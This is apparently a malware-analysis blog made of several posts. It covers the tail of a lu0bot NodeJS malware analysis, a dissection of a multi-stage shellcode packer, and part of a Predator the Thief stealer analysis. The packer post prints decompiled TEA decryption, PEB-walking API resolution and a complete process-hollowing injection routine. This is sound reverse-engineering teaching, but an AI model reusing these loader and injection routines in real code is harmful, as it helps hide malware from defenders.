target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,i
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function],
interval: 200,
last_sev: XXXXXXXXXXXXX,
stmr: false },
XXXXXXXXXXXX:
{ id: 'XXXXXXXXXXXX',
pid: 'XXXXXXX',
gen: XXXXXXXXXXXXX,
last: XXXXXXXXXXXXX,
tmr: [Object],
p: {},
psz: 1163,
btotal: 0,
type: 'download',
hn: 'bufread',
target: 'binit',
fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
size: 798,
fcb: [Function],
rcb: [Function] } },
h:
{ eval: [Function],
bufwrite: [Function],
bufread: [Function],
filewrite: [Function],
fileread: [Function] },
mp_pget: [Function],
mp_pget_ev: [Function],
mp_new: [Function: mp_new],
mp_get: [Function: mp_get],
mp_count: [Function: mp_count],
mp_loss: [Function: mp_loss],
mp_del: [Function: mp_del],
mp_dtchk: [Function: mp_dtchk],
mp_dtsum: [Function: mp_dtsum],
mp_pset: [Function: mp_pset],
mp_opnew: [Function: mp_opnew],
mp_opstat: [Function: mp_opstat] }
lq
{ ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
' XXXXXXXXXXXXX': [ 1, <Buffer 31> ]
}
MITRE ATT&CK
- T1059
- T1482
- T1083
- T1046
- T1057
- T1518
- T1082
- T1614
- T1016
- T1124
- T1005
- T1008
- T1571
ELI5 summary
- lu0bot is a NodeJS Malware.
- Network communications are mixing TCP (loader) and UDP (main stage).
- Itโs pushed at least with Garbage Cleaner.
- Its default setup seems to be a aggressive telemetry harvester.
- Due to its task manager architecture it is technically able to be everything.

Conclusion
Lu0bot is a curious piece of code which I could admit, even if I donโt like at all NodeJS/JavaScript code, the task manager succeeded in mindblowing me for its ingeniosity.

I have more questions than answers since then I started to put my hands on that one, but the thing that Iโm sure, itโs active and harvesting data from bots that I have never seen before in such an aggressive way.
Special thanks: @benkow_
Anatomy of a simple and popular packer
Itโs been a while that I havenโt release some stuff here and indeed, itโs mostly caused by how fucked up 2020 was. I would have been pleased if this global pandemic hasnโt wrecked me so much but i was served as well. Nowadays, with everything closed, corona haircut is new trend and finding a graphic cards or PS5 is like winning at the lottery. So why not fflush all that bullshit by spending some time into malware curiosities (with the support of some croissant and animes), whatever the time, weebs are still weebs.
So letโs start 2021 with something really simpleโฆ Why not dissecting completely to the ground a well-known packer mixing C/C++ & shellcode (active since some years now).
Typical icons that could be seen with this packer
This one is a cool playground for checking its basics with someone that need to start learning into malware analysis/reverse engineering:
- Obfuscation
- Cryptography
- Decompression
- Multi-stage
- Shellcode
- Remote Thread Hijacking
Disclamer: This post will be different from what iโm doing usually in my blog with almost no text but i took the time for decompiling and reviewing all the code. So I considered everything is explain.
For this analysis, this sample will be used:
B7D90C9D14D124A163F5B3476160E1CF
Architecture
Speaking of itself, the packer is split into 3 main stages:
- A PE that will allocate, decrypt and execute the shellcode nยฐ1
- Saving required WinAPI calls, decrypting, decompressing and executing shellcode nยฐ2
- Saving required WinAPI calls (again) and executing payload with a remote threat hijacking trick
An overview of this packer
Stage 1 โ The PE
The first stage is misleading the analyst to think that a decent amount of instructions are performed, butโฆ after purging all the junk code and unused functions, the cleaned Winmainย function is unveiling a short and standard setup for launching a shellcode.
int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
int i;
SIZE_T uBytes;
HMODULE hModule;
// Will be used for Virtual Protect call
hKernel32 = LoadLibraryA("kernel32.dll");
// Bullshit stuff for getting correct uBytes value
uBytes = CONST_VALUE
_LocalAlloc();
for ( i = 0; j < uBytes; ++i ) {
(_FillAlloc)();
}
_VirtualProtect();
// Decrypt function vary between date & samples
_Decrypt();
_ExecShellcode();
return 0;
}
Itโs important to notice this packer is changing its first stage regularly, but it doesnโt mean the whole will change in the same way. In fact, the core remains intact but the form will be different, so whenever you have reversed this piece of code once, the pattern is recognizable easily in no time.
Beside using a classic VirtualAlloc, this one is using LocalAlloc for creating an allocated memory page to store the second stage. The variable uBytes was continuously created behind some spaghetti code (global values, loops and conditions).
int (*LocalAlloc())(void)
{
int (*pBuff)(void); // eax
pBuff = LocalAlloc(0, uBytes);
Shellcode = pBuff;
return pBuff;
}
For avoiding giving directly the position of the shellcode, Itโs using a simple addition trick for filling the buffer step by step.
int __usercall FillAlloc(int i)
{
int result; // eax
// All bullshit code removed
result = dword_834B70 + 0x7E996;
*(Shellcode + i) = *(dword_834B70 + 0x7E996 + i);
return result;
}
Then obviously, whenever an allocation is called, VirtualProtect is not far away for finishing the job. The function name is obfuscated as first glance and adjusted. then for avoiding calling it directly, our all-time classic GetProcAddress will do the job for saving this WinAPI call into a pointer function.
BOOL __stdcall VirtualProtect()
{
char v1[4]; // [esp+4h] [ebp-4h] BYREF
String = 0;
lstrcatA(&String, "VertualBritect"); // No ragrets
byte_442581 = 'i';
byte_442587 = 'P';
byte_442589 = 'o';
pVirtualProtect = GetProcAddress(hKernel32, &String);
return (pVirtualProtect)(Shellcode, uBytes, 64, v1);
}
Decrypting the the first shellcode
The philosophy behind this packer will lead you to think that the decryption algorithm will not be that much complex. Here the encryption used is TEA, itโs simple and easy to used
void Decrypt()
{
SIZE_T size;
PVOID sc;
SIZE_T i;
size = uBytes;
sc = Shellcode;
for ( i = size >> 3; i; --i )
{
_TEADecrypt(sc);
sc = sc + 8; // +8 due it's v[0] & v[1] with TEA Algorithm
}
}
I am always skeptical whenever iโm reading some manual implementation of a known cryptography algorithm, due that most of the time it could be tweaked. So before trying to understand what are the changes, letโs take our time to just make sure about which variable we have to identified:
- v[0] and v[1]
- y & z
- Number of circles (n=32)
- 16 bytes key represented as k[0], k[1], k[2], k[3]
- delta
- sum
Identifying TEA variables in x32dbg
For adding more salt to it, you have your dose of mindless amount of garbage instructions.
Junk code hiding the algorithm
After removing everything unnecessary, our TEA decryption algorithm is looking like this
int *__stdcall _TEADecrypt(int *v)
{
unsigned int y, z, sum;
int i, v7, v8, v9, v10, k[4];
int *result;
y = *v;
z = v[1];
sum = 0xC6EF3720;
k[0] = dword_440150;
k[1] = dword_440154;
k[3] = dword_440158;
k[2] = dword_44015C;
i = 32;
do
{
// Junk code purged
v7 = k[2] + (y >> 5);
v9 = (sum + y) ^ (k[3] + 16 * y);
v8 = v9 ^ v7;
z -= v8;
v10 = k[0] + 16 * z;
(_TEA_Y_Operation)((sum + z) ^ (k[1] + (z >> 5)) ^ v10);
sum += 0x61C88647; // exact equivalent of sum -= 0x9
--i;
}
while ( i );
result = v;
v[1] = z;
*v = y;
return result;
}
At this step, the first stage of this packer is now almost complete. By inspecting the dump, you can recognizing our shellcode being ready for action (55 8B EC opcodes are in my personal experience stuff that triggered me almost everytime).
Stage 2 โ Falling into the shellcode playground
This shellcode is pretty simple, the main function is just calling two functions:
- One focused for saving fundamentals WinAPI call
- Creating the shellcode API structure and setup the workaround for pushing and launching the last shellcode stage
Shellcode main()
Give my WinAPI calls
Disclamer: In this part, almost no text explanation, everything is detailed with the code
PEB & BaseDllName
Like any another shellcode, it needs to get some address function to start its job, so our PEB best friend is there to do the job.
00965233 | 55 | push ebp |
00965234 | 8BEC | mov ebp,esp |
00965236 | 53 | push ebx |
00965237 | 56 | push esi |
00965238 | 57 | push edi |
00965239 | 51 | push ecx |
0096523A | 64:FF35 30000000 | push dword ptr fs:[30] | Pointer to PEB
00965241 | 58 | pop eax |
00965242 | 8B40 0C | mov eax,dword ptr ds:[eax+C] | Pointer to Ldr
00965245 | 8B48 0C | mov ecx,dword ptr ds:[eax+C] | Pointer to Ldr->InLoadOrderModuleList
00965248 | 8B11 | mov edx,dword ptr ds:[ecx] | Pointer to List Entry (aka pEntry)
0096524A | 8B41 30 | mov eax,dword ptr ds:[ecx+30] | Pointer to BaseDllName buffer (pEntry->DllBaseName->Buffer)
Letโs take a look then in the PEB structure
For beginners, i sorted all these values with there respective variable names and meaning.
offset | Type | Variable | Value |
---|---|---|---|
0x00 | LIST_ENTRY | InLoaderOrderModuleList->Flink | A8 3B 8D 00 |
0x04 | LIST_ENTRY | InLoaderOrderModuleList->Blink | C8 37 8D 00 |
0x08 | LIST_ENTRY | InMemoryOrderList->Flink | B0 3B 8D 00 |
0x0C | LIST_ENTRY | InMemoryOrderList->Blick | D0 37 8D 00 |
0x10 | LIST_ENTRY | InInitializationOrderModulerList->Flink | 70 3F 8D 00 |
0x14 | LIST_ENTRY | InInitializationOrderModulerList->Blink | BC 7B CC 77 |
0x18 | PVOID | BaseAddress | 00 00 BB 77 |
0x1C | PVOID | EntryPoint | 00 00 00 00 |
0x20 | UINT | SizeOfImage | 00 00 19 00 |
0x24 | UNICODE_STRING | FullDllName | 3A 00 3C 00 A0 35 8D 00 |
0x2C | UNICODE_STRING | BaseDllName | 12 00 14 00 B0 6D BB 77 |
Because he wants at the first the BaseDllName for getting kernel32.dll We could supposed the shellcode will use the offset 0x2c for having the value but itโs pointing to 0x30
008F524A | 8B41 30 | mov eax,dword ptr ds:[ecx+30]
It means, It will grab buffer pointer from the UNICODE_STRING structure
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
After that, the magic appears
Register | Address | Symbol Value |
---|---|---|
EAX | 77BB6DB0 | Lโntdll.dllโ |
Homemade checksum algorithm ?
Searching a library name or function behind its respective hash is a common trick performed in the wild.
00965248 | 8B11 | mov edx,dword ptr ds:[ecx] | Pointer to List Entry (aka pEntry)
0096524A | 8B41 30 | mov eax,dword ptr ds:[ecx+30] | Pointer to BaseDllName buffer
0096524D | 6A 02 | push 2 | Increment is 2 due to UNICODE value
0096524F | 8B7D 08 | mov edi,dword ptr ss:[ebp+8] |
00965252 | 57 | push edi | DLL Hash (searched one)
00965253 | 50 | push eax | DLL Name
00965254 | E8 5B000000 | call 9652B4 | Checksum()
00965259 | 85C0 | test eax,eax |
0096525B | 74 04 | je 965261 |
0096525D | 8BCA | mov ecx,edx | pEntry = pEntry->Flink
0096525F | EB E7 | jmp 965248 |
The checksum function used here seems to have a decent risk of hash collisions, but based on the number of occurrences and length of the strings, itโs negligible. Otherwise yeah, it could be fucked up very quickly.
BOOL Checksum(PWSTR *pBuffer, int hash, int i)
{
int pos; // ecx
int checksum; // ebx
int c; // edx
pos = 0;
checksum = 0;
c = 0;
do
{
LOBYTE(c) = *pBuffer | 0x60; // Lowercase
checksum = 2 * (c + checksum);
pBuffer += i; // +2 due it's UNICODE
LOBYTE(pos) = *pBuffer;
--pos;
}
while ( *pBuffer && pos );
return checksum != hash;
}
Find the correct function address
With the pEntry list saved and the checksum function assimilated, it only needs to perform a loop that repeat the process to get the name of the function, put him into the checksum then comparing it with the one that the packer wants.
00965261 | 8B41 18 | mov eax,dword ptr ds:[ecx+18] | BaseAddress
00965264 | 50 | push eax |
00965265 | 8B58 3C | mov ebx,dword ptr ds:[eax+3C] | PE Signature (e_lfanew) RVA
00965268 | 03C3 | add eax,ebx | pNTHeader = BaseAddress + PE Signature RVA
0096526A | 8B58 78 | mov ebx,dword ptr ds:[eax+78] | Export Table RVA
0096526D | 58 | pop eax |
0096526E | 50 | push eax |
0096526F | 03D8 | add ebx,eax | Export Table
00965271 | 8B4B 1C | mov ecx,dword ptr ds:[ebx+1C] | Address of Functions RVA
00965274 | 8B53 20 | mov edx,dword ptr ds:[ebx+20] | Address of Names RVA
00965277 | 8B5B 24 | mov ebx,dword ptr ds:[ebx+24] | Address of Name Ordinals RVA
0096527A | 03C8 | add ecx,eax | Address Table
0096527C | 03D0 | add edx,eax | Name Pointer Table (NPT)
0096527E | 03D8 | add ebx,eax | Ordinal Table (OT)
00965280 | 8B32 | mov esi,dword ptr ds:[edx] |
00965282 | 58 | pop eax |
00965283 | 50 | push eax | BaseAddress
00965284 | 03F0 | add esi,eax | Function Name = NPT[i] + BaseAddress
00965286 | 6A 01 | push 1 | Increment to 1 loop
00965288 | FF75 0C | push dword ptr ss:[ebp+C] | Function Hash (searched one)
0096528B | 56 | push esi | Function Name
0096528C | E8 23000000 | call 9652B4 | Checksum()
00965291 | 85C0 | test eax,eax |
00965293 | 74 08 | je 96529D |
00965295 | 83C2 04 | add edx,4 |
00965298 | 83C3 02 | add ebx,2 |
0096529B | EB E3 | jmp 965280 |
Save the function address
When the name is matching with the hash in output, so it only requiring now to grab the function address and store into EAX.
0096529D | 58 | pop eax |
0096529E | 33D2 | xor edx,edx | Purge
009652A0 | 66:8B13 | mov dx,word ptr ds:[ebx] |
009652A3 | C1E2 02 | shl edx,2 | Ordinal Value
009652A6 | 03CA | add ecx,edx | Function Address RVA
009652A8 | 0301 | add eax,dword ptr ds:[ecx] | Function Address = BaseAddress + Function Address RVA
009652AA | 59 | pop ecx |
009652AB | 5F | pop edi |
009652AC | 5E | pop esi |
009652AD | 5B | pop ebx |
009652AE | 8BE5 | mov esp,ebp |
009652B0 | 5D | pop ebp |
009652B1 | C2 0800 | ret 8 |
Road to the second shellcode ! \o/
Saving API into a structure
Now that LoadLibraryA and GetProcAddress are saved, it only needs to select the function name it wants and putting it into the routine explain above.
In the end, the shellcode is completely setup
struct SHELLCODE
{
_BYTE Start;
SCHEADER *ScHeader;
int ScStartOffset;
int seed;
int (__stdcall *pLoadLibraryA)(int *);
int (__stdcall *pGetProcAddress)(int, int *);
PVOID GlobalAlloc;
PVOID GetLastError;
PVOID Sleep;
PVOID VirtuaAlloc;
PVOID CreateToolhelp32Snapshot;
PVOID Module32First;
PVOID CloseHandle;
};
struct SCHEADER
{
_DWORD dwSize;
_DWORD dwSeed;
_BYTE option;
_DWORD dwDecompressedSize;
};
Abusing fake loops
Something that i really found cool in this packer is how the fake loop are funky. They have no sense but somehow they are working and itโs somewhat amazing. The more absurd it is, the more i like and i found this really clever.
int __cdecl ExecuteShellcode(SHELLCODE *sc)
{
unsigned int i; // ebx
int hModule; // edi
int lpme[137]; // [esp+Ch] [ebp-224h] BYREF
lpme[0] = 0x224;
for ( i = 0; i < 0x64; ++i )
{
if ( i )
(sc->Sleep)(100);
hModule = (sc->CreateToolhelp32Snapshot)(TH32CS_SNAPMODULE, 0);
if ( hModule != -1 )
break;
if ( (sc->GetLastError)() != 24 )
break;
}
if ( (sc->Module32First)(hModule, lpme) )
JumpToShellcode(sc); // <------ This is where to look :)
return (sc->CloseHandle)(hModule);
}
Allocation & preparing new shellcode
void __cdecl JumpToShellcode(SHELLCODE *SC)
{
int i;
unsigned __int8 *lpvAddr;
unsigned __int8 *StartOffset;
StartOffset = SC->ScStartOffset;
Decrypt(SC, StartOffset, SC->ScHeader->dwSize, SC->ScHeader->Seed);
if ( SC->ScHeader->Option )
{
lpvAddr = (SC->VirtuaAlloc)(0, *(&SC->ScHeader->dwDecompressSize), 4096, 64);
i = 0;
Decompress(StartOffset, SC->ScHeader->dwDecompressSize, lpvAddr, i);
StartOffset = lpvAddr;
SC->ScHeader->CompressSize = i;
}
__asm { jmp [ebp+StartOffset] }
Decryption & Decompression
The decryption is even simpler than the one for the first stage by using a simple re-implementation of the ms_rand function, with a set seed value grabbed from the shellcode structure, that i decided to call here SCHEADER.ย
int Decrypt(SHELLCODE *sc, int startOffset, unsigned int size, int s)
{
int seed; // eax
unsigned int count; // esi
_BYTE *v6; // edx
seed = s;
count = 0;
for ( API->seed = s; count < size; ++count )
{
seed = ms_rand(sc);
*v6 ^= seed;
}
return seed;
}
XOR everywhere \o/
Then when itโs done, it only needs to be decompressed.
Decrypted shellcode entering into the decompression loop
Stage 3 โ Launching the payload
Reaching finally the final stage of this packer. This is the exact same pattern like the first shellcode:
- Find & Stored GetProcAddress & Load Library
- Saving all WinAPI functions required
- Pushing the payload
The structure from this one is a bit longer
struct SHELLCODE
{
PVOID (__stdcall *pLoadLibraryA)(LPCSTR);
PVOID (__stdcall *pGetProcAddress)(HMODULE, LPSTR);
char notused;
PVOID ScOffset;
PVOID LoadLibraryA;
PVOID MessageBoxA;
PVOID GetMessageExtraInfo;
PVOID hKernel32;
PVOID WinExec;
PVOID CreateFileA;
PVOID WriteFile;
PVOID CloseHandle;
PVOID CreateProcessA;
PVOID GetThreadContext;
PVOID VirtualAlloc;
PVOID VirtualAllocEx;
PVOID VirtualFree;
PVOID ReadProcessMemory;
PVOID WriteProcessMemory;
PVOID SetThreadContext;
PVOID ResumeThread;
PVOID WaitForSingleObject;
PVOID GetModuleFileNameA;
PVOID GetCommandLineA;
PVOID RegisterClassExA;
PVOID CreateWindowA;
PVOID PostMessageA;
PVOID GetMessageA;
PVOID DefWindowProcA;
PVOID GetFileAttributesA;
PVOID hNtdll;
PVOID NtUnmapViewOfSection;
PVOID NtWriteVirtualMemory;
PVOID GetStartupInfoA;
PVOID VirtualProtectEx;
PVOID ExitProcess;
};
Interestingly, the stack string trick is different from the first stage
Fake loop once, fake loop forever
At this rate now, you understood, that almost everything is a lie in this packer. We have another perfect example here, with a fake loop consisting of checking a non-existent file attribute where in the reality, the variable โjโ is the only one that have a sense.
void __cdecl _Inject(SC *sc)
{
LPSTRING lpFileName; // [esp+0h] [ebp-14h]
char magic[8];
unsigned int j;
int i;
strcpy(magic, "apfHQ");
j = 0;
i = 0;
while ( i != 111 )
{
lpFileName = (sc->GetFileAttributesA)(magic);
if ( j > 1 && lpFileName != 0x637ADF )
{
i = 111;
SetupInject(sc);
}
++j;
}
}
Good olโ remote thread hijacking
Then entering into the Inject setup function, no need much to say, the remote thread hijacking trick is used for executing the final payload.
ScOffset = sc->ScOffset;
pNtHeader = (ScOffset->e_lfanew + sc->ScOffset);
lpApplicationName = (sc->VirtualAlloc)(0, 0x2800, 0x1000, 4);
status = (sc->GetModuleFileNameA)(0, lpApplicationName, 0x2800);
if ( pNtHeader->Signature == 0x4550 ) // "PE"
{
(sc->GetStartupInfoA)(&lpStartupInfo);
lpCommandLine = (sc->GetCommandLineA)(0, 0, 0, 0x8000004, 0, 0, &lpStartupInfo, &lpProcessInformation);
status = (sc->CreateProcessA)(lpApplicationName, lpCommandLine);
if ( status )
{
(sc->VirtualFree)(lpApplicationName, 0, 0x8000);
lpContext = (sc->VirtualAlloc)(0, 4, 4096, 4);
lpContext->ContextFlags = &loc_10005 + 2;
status = (sc->GetThreadContext)(lpProcessInformation.hThread, lpContext);
if ( status )
{
(sc->ReadProcessMemory)(lpProcessInformation.hProcess, lpContext->Ebx + 8, &BaseAddress, 4, 0);
if ( BaseAddress == pNtHeader->OptionalHeader.ImageBase )
(sc->NtUnmapViewOfSection)(lpProcessInformation.hProcess, BaseAddress);
lpBaseAddress = (sc->VirtualAllocEx)(
lpProcessInformation.hProcess,
pNtHeader->OptionalHeader.ImageBase,
pNtHeader->OptionalHeader.SizeOfImage,
0x3000,
0x40);
(sc->NtWriteVirtualMemory)(
lpProcessInformation.hProcess,
lpBaseAddress,
sc->ScOffset,
pNtHeader->OptionalHeader.SizeOfHeaders,
0);
for ( i = 0; i < pNtHeader->FileHeader.NumberOfSections; ++i )
{
Section = (ScOffset->e_lfanew + sc->ScOffset + 40 * i + 248);
(sc->NtWriteVirtualMemory)(
lpProcessInformation.hProcess,
Section[1].Size + lpBaseAddress,
Section[2].Size + sc->ScOffset,
Section[2].VirtualAddress,
0);
}
(sc->WriteProcessMemory)(
lpProcessInformation.hProcess,
lpContext->Ebx + 8,
&pNtHeader->OptionalHeader.ImageBase,
4,
0);
lpContext->Eax = pNtHeader->OptionalHeader.AddressOfEntryPoint + lpBaseAddress;
(sc->SetThreadContext)(lpProcessInformation.hThread, lpContext);
(sc->ResumeThread)(lpProcessInformation.hThread);
(sc->CloseHandle)(lpProcessInformation.hThread);
(sc->CloseHandle)(lpProcessInformation.hProcess);
status = (sc->ExitProcess)(0);
}
}
}
Same but different, but still the same
As explained at the beginning, whenever you have reversed this packer, you understand that the core is pretty similar every-time. It took only few seconds, to breakpoints at specific places to reach the shellcode stage(s).
Identifying core pattern (LocalAlloc, Module Handle and VirtualProtect)
The funny is on the decryption used now in the first stage, itโs the exact copy pasta from the shellcode side.
TEA decryption replaced with rand() + xor like the first shellcode stage
At the start of the second stage, there is not so much to say that the instructions are almost identical
Shellcode nยฐ1 is identical into two different campaign waves
It seems that the second shellcode changed few hours ago (at the date of this paper), so letโs see if other are motivated to make their own analysis of it
Conclusion
Well well, itโs cool sometimes to deal with something easy but efficient. It has indeed surprised me to see that the core is identical over the time but I insist this packer is really awesome for training and teaching someone into malware/reverse engineering.
Well, now itโs time to go serious for the next release
Stay safe in those weird times o/
Letโs play (again) with Predator the thief
Whenever I reverse a sample, I am mostly interested in how it was developed, even if in the end the techniques employed are generally the same, I am always curious about what was the way to achieve a task, or just simply understand the code philosophy of a piece of code. It is a very nice way to spot different trending and discovering (sometimes) new tricks that you never know it was possible to do. This is one of the main reasons, I love digging mostly into stealers/clippers for their accessibility for being reversed, and enjoying malware analysis as a kind of game (unless some exceptions like Nymaim that is literally hell).
Itโs been 1 year and a half now that I start looking into โPredator The Thiefโ, and this malware has evolved over time in terms of content added and code structure. This impression could be totally different from others in terms of stealing tasks performed, but based on my first in-depth analysis,, the code has changed too much and it was necessary to make another post on it.
This one will focus on some major aspects of the 3.3.2 version, but will not explain everything (because some details have already been mentioned in other papers,ย some subjects are known). Also, times to times I will add some extra commentary about malware analysis in general.
Anti-Disassembly
When you open an unpacked binary in IDA or other disassembler software like GHIDRA, there is an amount of code that is not interpreted correctly which leads to rubbish code, the incapacity to construct instructions or showing some graph. Behind this, itโs obvious that an anti-disassembly trick is used.
The technique exploited here is known and used in the wild by other malware, it requires just a few opcodes to process and leads at the end at the creation of a false branch. In this case, it begins with a simple xor instruction that focuses on configuring the zero flag and forcing the JZ jump condition to work no matter what, so, at this stage, itโs understandable that something suspicious is in progress. Then the MOV opcode (0xB8) next to the jump is a 5 bytes instruction and disturbing the disassembler to consider that this instruction is the right one to interpret beside that the correct opcode is inside this one, and in the end, by choosing this wrong path malicious tasks are hidden.
Of course, fixing this issue is simple, and required just a few seconds. For example with IDA, you need to undefine the MOV instruction by pressing the keyboard shortcut โUโ, to produce this pattern.
Then skip the 0xB8 opcode, and pushing on โCโ at the 0xE8 position, to configure the disassembler to interpret instruction at this point.
Replacing the 0xB8 opcode by 0x90. with a hexadecimal editor, will fix the issue. Opening again the patched PE, you will see that IDA is now able to even show the graph mode.
After patching it, there are still some parts that canโt be correctly parsed by the disassembler, but after reading some of the code locations, some of them are correct, so if you want to create a function, you can select the โlocโ section then pushed on โPโ to create a sub-function, of course, this action could lead to some irreversible thing if you are not sure about your actions and end to restart again the whole process to remove a the ant-disassembly tricks, so this action must be done only at last resort.
Code Obfuscation
Whenever you are analyzing Predator, you know that you will have to deal with some obfuscation tricks almost everywhere just for slowing down your code analysis. Of course, they are not complicated to assimilate, but as always, simple tricks used at their finest could turn a simple fun afternoon to literally โwelcome to Dark Soulsโ. The concept was already there in the first in-depth analysis of this malware, and the idea remains over and over with further updates on it. The only differences are easy to guess :
- More layers of obfuscation have been added
- Techniques already used are just adjusted.
- More dose of randomness
As a reversing point of view, I am considering this part as one the main thing to recognized this stealer, even if of course, you can add network communication and C&C pattern as other ways for identifying it, inspecting the code is one way to clarify doubts (and I understand that this statement is for sure not working for every malware), but the idea is that nowadays itโs incredibly easy to make mistakes by being dupe by rules or tags on sandboxes, due to similarities based on code-sharing, or just literally creating false flag.
GetModuleAddress
Already there in a previous analysis, recreating the GetProcAddress is a popular trick to hide an API call behind a simple register call. Over the updates, the main idea is still there but the main procedures have been modified, reworked or slightly optimized.
First of all, we recognized easily the PEB retrieved by spotting fs[0x30] behind some extra instructions.
then from it, the loader data section is requested for two things:
- Getting the InLoadOrderModuleList pointer
- Getting the InMemoryOrderModuleList pointer
For those who are unfamiliar by this, basically, the PEB_LDR_DATA is a structure is where is stored all the information related to the loaded modules of the process.
Then, a loop is performing a basic search on every entry of the module list but in โmemory orderโ on the loader data, by retrieving the module name, generating a hash of it and when itโs done, it is compared with a hardcoded obfuscated hash of the kernel32 module and obviously, if it matches, the module base address is saved, if itโs not, the process is repeated again and again.

The XOR kernel32 hashes compared with the one created
Nowadays, using hashes for a function name or module name is something that you can see in many other malware, purposes are multiple and this is one of the ways to hide some actions. An example of this code behavior could be found easily on the internet and as I said above, this one is popular and already used.
GetProcAddress / GetLoadLibrary
Always followed by GetModuleAddress, the code for recreating GetProcAddress is by far the same architecture model than the v2, in term of the concept used. If the function is forwarded, it will basically perform a recursive call of itself by getting the forward address, checking if the library is loaded then call GetProcAddress again with new values.
Xor everything
Itโs almost unnecessary to talk about it, but as in-depth analysis, if you have never read the other article before, itโs always worth to say some words on the subject (as a reminder). The XOR encryption is a common cipher that required a rudimentary implementation for being effective :
- Only one operator is used (XOR)
- itโs not consuming resources.
- It could be used as a component of other ciphers
This one is extremely popular in malware and the goal is not really to produce strong encryption because itโs ridiculously easy to break most of the time, they are used for hiding information or keywords that could be triggering alerts, rulesโฆ
- Communication between host & server
- Hiding strings
- Orโฆ simply used as an absurd step for obfuscating the code
- etcโฆ
A typical example in Predator could be seeing huge blocks with only two instructions (XOR & MOV), where stacks strings are decrypted X bytes per X bytes by just moving content on a temporary value (stored on EAX), XORed then pushed back to EBP, and the principle is reproduced endlessly again and again. This is rudimentary, In this scenario, itโs just part of the obfuscation process heavily abused by predator, for having an absurd amount of instruction for simple things.
Also for some cases, When a hexadecimal/integer value is required for an API call, it could be possible to spot another pattern of a hardcoded string moved to a register then only one XOR instruction is performed for revealing the correct value, this trivial thing is used for some specific cases like the correct position in the TEB for retrieving the PEB, an RVA of a specific module, โฆ
